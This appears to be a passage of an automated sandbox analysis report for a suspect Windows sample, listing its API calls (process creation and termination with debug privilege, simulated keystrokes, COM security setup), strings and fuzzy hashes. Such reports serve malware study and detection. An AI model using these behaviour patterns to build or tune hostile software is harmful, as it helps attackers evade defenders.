                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0100F910), ref: 00FF8D5C
                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00FF8ED6
                                                • SysFreeString.OLEAUT32(?), ref: 00FF8F00
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                • String ID:
                                                • API String ID: 560350794-0
                                                • Opcode ID: 799944cb3f25851dca5b4ef5a7c95cda91d934037fb96953756d68293b024729
                                                • Instruction ID: 1b0eebbda972a7cc4d8e455606d0f3915f6af3570becf2960e434f9b37c47067
                                                • Opcode Fuzzy Hash: 799944cb3f25851dca5b4ef5a7c95cda91d934037fb96953756d68293b024729
                                                • Instruction Fuzzy Hash: 67F14A71A00109AFCF14DFA4C884EBEB7B9FF45354F148458FA05AB261DB71AE46DB50
                                                APIs
                                                • _memset.LIBCMT ref: 00FFF6B5
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FFF848
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FFF86C
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FFF8AC
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FFF8CE
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FFFA4A
                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00FFFA7C
                                                • CloseHandle.KERNEL32(?), ref: 00FFFAAB
                                                • CloseHandle.KERNEL32(?), ref: 00FFFB22
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                • String ID:
                                                • API String ID: 4090791747-0
                                                • Opcode ID: 7a11374df5947723b0ff1ebc65e36f615669d523d59b5a8feb5bf8e1d92c5691
                                                • Instruction ID: f578d6d4626337bb622e480639a7e682835aa054102d358b2e1656e8eaf44b5d
                                                • Opcode Fuzzy Hash: 7a11374df5947723b0ff1ebc65e36f615669d523d59b5a8feb5bf8e1d92c5691
                                                • Instruction Fuzzy Hash: 4AE1D2316043059FCB24EF24C881B7ABBE1AF85364F18846DF9859B2A1CB75DC49EB52
                                                APIs
                                                  • Part of subcall function 00FE466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FE3697,?), ref: 00FE468B
                                                  • Part of subcall function 00FE466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FE3697,?), ref: 00FE46A4
                                                  • Part of subcall function 00FE4A31: GetFileAttributesW.KERNEL32(?,00FE370B), ref: 00FE4A32
                                                • lstrcmpiW.KERNEL32(?,?), ref: 00FE4D40
                                                • _wcscmp.LIBCMT ref: 00FE4D5A
                                                • MoveFileW.KERNEL32(?,?), ref: 00FE4D75
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                • String ID:
                                                • API String ID: 793581249-0
                                                • Opcode ID: 1d46f74f8016b9c25b834f1cf70e0b4aca768922e8a66c59ecd6fe3303837f41
                                                • Instruction ID: 2f83bd4744e6445ff040f6080d4bd5ccf3d3e88277fef222e43ef564270963bb
                                                • Opcode Fuzzy Hash: 1d46f74f8016b9c25b834f1cf70e0b4aca768922e8a66c59ecd6fe3303837f41
                                                • Instruction Fuzzy Hash: 195161B25083859BC765EB65DC819DFB3ECAF85750F00092EB185D3151EE38F288D766
                                                APIs
                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 010086FF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: InvalidateRect
                                                • String ID:
                                                • API String ID: 634782764-0
                                                • Opcode ID: 25a18faf68d9642ff1b22a71be4a578eea0e9123300a95c7d4560581420c5977
                                                • Instruction ID: dc5405074b117084550189229648ccbcec388481979f9caa84ebe3b8f70b00b7
                                                • Opcode Fuzzy Hash: 25a18faf68d9642ff1b22a71be4a578eea0e9123300a95c7d4560581420c5977
                                                • Instruction Fuzzy Hash: B651A130900205BFFB729B289C88F9D3BA4BB09724F108157FAD4E61E1DB76E690CB50
                                                APIs
                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00FBC2F7
                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FBC319
                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FBC331
                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00FBC34F
                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FBC370
                                                • DestroyIcon.USER32(00000000), ref: 00FBC37F
                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FBC39C
                                                • DestroyIcon.USER32(?), ref: 00FBC3AB
                                                  • Part of subcall function 0100A4AF: DeleteObject.GDI32(00000000), ref: 0100A4E8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                • String ID:
                                                • API String ID: 2819616528-0
                                                • Opcode ID: 4c02f5aa17ecb87a55705990f6a5c3acd336d34fe53afa56cf7a3844d4363fc8
                                                • Instruction ID: 8a3b48b5aa5dbc9bdae274aeb7c96052d8a4cbfc65640b83be24ba9544ce1d08
                                                • Opcode Fuzzy Hash: 4c02f5aa17ecb87a55705990f6a5c3acd336d34fe53afa56cf7a3844d4363fc8
                                                • Instruction Fuzzy Hash: 2A516A75A00209AFDB20EF65CC45BAA7BE5FB58320F104518F942E7290DB75ED51EBA0
                                                APIs
                                                  • Part of subcall function 00FDA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FDA84C
                                                  • Part of subcall function 00FDA82C: GetCurrentThreadId.KERNEL32 ref: 00FDA853
                                                  • Part of subcall function 00FDA82C: AttachThreadInput.USER32(00000000,?,00FD9683,?,00000001), ref: 00FDA85A
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FD968E
                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00FD96AB
                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00FD96AE
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FD96B7
                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00FD96D5
                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FD96D8
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FD96E1
                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00FD96F8
                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FD96FB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                • String ID:
                                                • API String ID: 2014098862-0
                                                • Opcode ID: 532594f7d14c8c2ac262375db8a05b4924565635371e8d8a4c8845d30f05030d
                                                • Instruction ID: 3933a9499bd32946ac957850dcf7c5b915efe7ece0db232b8a48499c0f7334c2
                                                • Opcode Fuzzy Hash: 532594f7d14c8c2ac262375db8a05b4924565635371e8d8a4c8845d30f05030d
                                                • Instruction Fuzzy Hash: 4F11C271914219BFF6216B709C49F6A3A2EDB4C750F100415F684AB194C9F75C10ABA4
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00FD853C,00000B00,?,?), ref: 00FD892A
                                                • HeapAlloc.KERNEL32(00000000,?,00FD853C,00000B00,?,?), ref: 00FD8931
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00FD853C,00000B00,?,?), ref: 00FD8946
                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00FD853C,00000B00,?,?), ref: 00FD894E
                                                • DuplicateHandle.KERNEL32(00000000,?,00FD853C,00000B00,?,?), ref: 00FD8951
                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00FD853C,00000B00,?,?), ref: 00FD8961
                                                • GetCurrentProcess.KERNEL32(00FD853C,00000000,?,00FD853C,00000B00,?,?), ref: 00FD8969
                                                • DuplicateHandle.KERNEL32(00000000,?,00FD853C,00000B00,?,?), ref: 00FD896C
                                                • CreateThread.KERNEL32(00000000,00000000,00FD8992,00000000,00000000,00000000), ref: 00FD8986
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                • String ID:
                                                • API String ID: 1957940570-0
                                                • Opcode ID: 4910a9301ce9910ddd70fee6a0f46832c20a4520daef4a0b4f9d78f56664a167
                                                • Instruction ID: d69df79fe413a2e44c30802b3e20af5fc318180c5694fb5c33eec02c156588bc
                                                • Opcode Fuzzy Hash: 4910a9301ce9910ddd70fee6a0f46832c20a4520daef4a0b4f9d78f56664a167
                                                • Instruction Fuzzy Hash: 2601B6B5240349BFE731EBA5DC4DFAB3BACEB89711F408411FA45DB295CA759800DB21
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: NULL Pointer assignment$Not an Object type
                                                • API String ID: 0-572801152
                                                • Opcode ID: cd22dbbe3006e31aa639e7e404b1131aaebf0dd2e07e6f2224a94c6b78f363a2
                                                • Instruction ID: ce406e605a39dcdf3c7786ee99f5bc03a95a07e4ef1a3d534aec405bfd5354bb
                                                • Opcode Fuzzy Hash: cd22dbbe3006e31aa639e7e404b1131aaebf0dd2e07e6f2224a94c6b78f363a2
                                                • Instruction Fuzzy Hash: C5C1A171E0420E9BDF10DF98C884BBEB7F5BF48314F148469EA45AB290E7B09D44DB60
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$_memset
                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                • API String ID: 2862541840-625585964
                                                • Opcode ID: cbb56e20dc51e129eb5b7e79a83df042a14d4f5f0e97706e47aea56546d54d42
                                                • Instruction ID: d0a916b8421668fa4200edff33f92b349d769645eba2b677345da4c3fbb91bf8
                                                • Opcode Fuzzy Hash: cbb56e20dc51e129eb5b7e79a83df042a14d4f5f0e97706e47aea56546d54d42
                                                • Instruction Fuzzy Hash: 1591A171E04219ABDF24DFA5CC48FAEB7B8EF45720F108159F605AB2A0D7B09941DFA0
                                                APIs
                                                  • Part of subcall function 00FD710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD7044,80070057,?,?,?,00FD7455), ref: 00FD7127
                                                  • Part of subcall function 00FD710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD7044,80070057,?,?), ref: 00FD7142
                                                  • Part of subcall function 00FD710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD7044,80070057,?,?), ref: 00FD7150
                                                  • Part of subcall function 00FD710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD7044,80070057,?), ref: 00FD7160
                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00FF9806
                                                • _memset.LIBCMT ref: 00FF9813
                                                • _memset.LIBCMT ref: 00FF9956
                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00FF9982
                                                • CoTaskMemFree.OLE32(?), ref: 00FF998D
                                                Strings
                                                • NULL Pointer assignment, xrefs: 00FF99DB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                • String ID: NULL Pointer assignment
                                                • API String ID: 1300414916-2785691316
                                                • Opcode ID: 0840361a11dd4e576030d827b9cbdfeb41393b2da3d59a193b4f2774751121f8
                                                • Instruction ID: bcb5c65bb7d8e7a40c0c2db4d07b6c6e3dfee48cecbf757c6ea67751d9cb8641
                                                • Opcode Fuzzy Hash: 0840361a11dd4e576030d827b9cbdfeb41393b2da3d59a193b4f2774751121f8
                                                • Instruction Fuzzy Hash: 30914A71D0422DEBDB20EF95CC40EEEBBB9AF04710F20415AF519A7291DB759A44DFA0
                                                APIs
                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01006E24
                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 01006E38
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01006E52
                                                • _wcscat.LIBCMT ref: 01006EAD
                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 01006EC4
                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 01006EF2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window_wcscat
                                                • String ID: SysListView32
                                                • API String ID: 307300125-78025650
                                                • Opcode ID: 018120d8a4fd831196d5242c82de7c035c494603eb40cf1bb2436199541a8e40
                                                • Instruction ID: c79793c4c2e8a77806246ae4edb1d0d1c3bf7a69675309a470c28a8ca256867f
                                                • Opcode Fuzzy Hash: 018120d8a4fd831196d5242c82de7c035c494603eb40cf1bb2436199541a8e40
                                                • Instruction Fuzzy Hash: E841A070A00349EBEB22DF68CC85BEE77E9EF08354F10056AF5C4A72D1D67699948B60
                                                APIs
                                                  • Part of subcall function 00FE3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00FE3C7A
                                                  • Part of subcall function 00FE3C55: Process32FirstW.KERNEL32(00000000,?), ref: 00FE3C88
                                                  • Part of subcall function 00FE3C55: CloseHandle.KERNEL32(00000000), ref: 00FE3D52
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FFE9A4
                                                • GetLastError.KERNEL32 ref: 00FFE9B7
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FFE9E6
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00FFEA63
                                                • GetLastError.KERNEL32(00000000), ref: 00FFEA6E
                                                • CloseHandle.KERNEL32(00000000), ref: 00FFEAA3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                • String ID: SeDebugPrivilege
                                                • API String ID: 2533919879-2896544425
                                                • Opcode ID: 84a9c660464db76143e27e8fc0781c7107d786f35b111f707e323212d14bf43e
                                                • Instruction ID: bd9f54de98214d62c25b06db9e537ffda714c0e944776b8e40158e4048964dbe
                                                • Opcode Fuzzy Hash: 84a9c660464db76143e27e8fc0781c7107d786f35b111f707e323212d14bf43e
                                                • Instruction Fuzzy Hash: 0641D1316042059FDB25EF14CC95FBDB7A5AF44714F188449FA429B3E2CBB9A808EB91
                                                APIs
                                                • LoadIconW.USER32(00000000,00007F03), ref: 00FE3033
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: IconLoad
                                                • String ID: blank$info$question$stop$warning
                                                • API String ID: 2457776203-404129466
                                                • Opcode ID: 2e8c0a3f3e5b4ddc74e3cc8bb08555da25663b9c3b2b5a4a6043ba4eafb6ccc4
                                                • Instruction ID: 3e4d93c6e241ba49ba746be8632b953f4e2bf402a4bd2792375ab7f5295349a5
                                                • Opcode Fuzzy Hash: 2e8c0a3f3e5b4ddc74e3cc8bb08555da25663b9c3b2b5a4a6043ba4eafb6ccc4
                                                • Instruction Fuzzy Hash: 9C112B327483C6BED7259A1ADC8AD6B779C9F15334F10405AFA00A7181EB759F4076A1
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00FE4312
                                                • LoadStringW.USER32(00000000), ref: 00FE4319
                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00FE432F
                                                • LoadStringW.USER32(00000000), ref: 00FE4336
                                                • _wprintf.LIBCMT ref: 00FE435C
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FE437A
                                                Strings
                                                • %s (%d) : ==> %s: %s %s, xrefs: 00FE4357
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
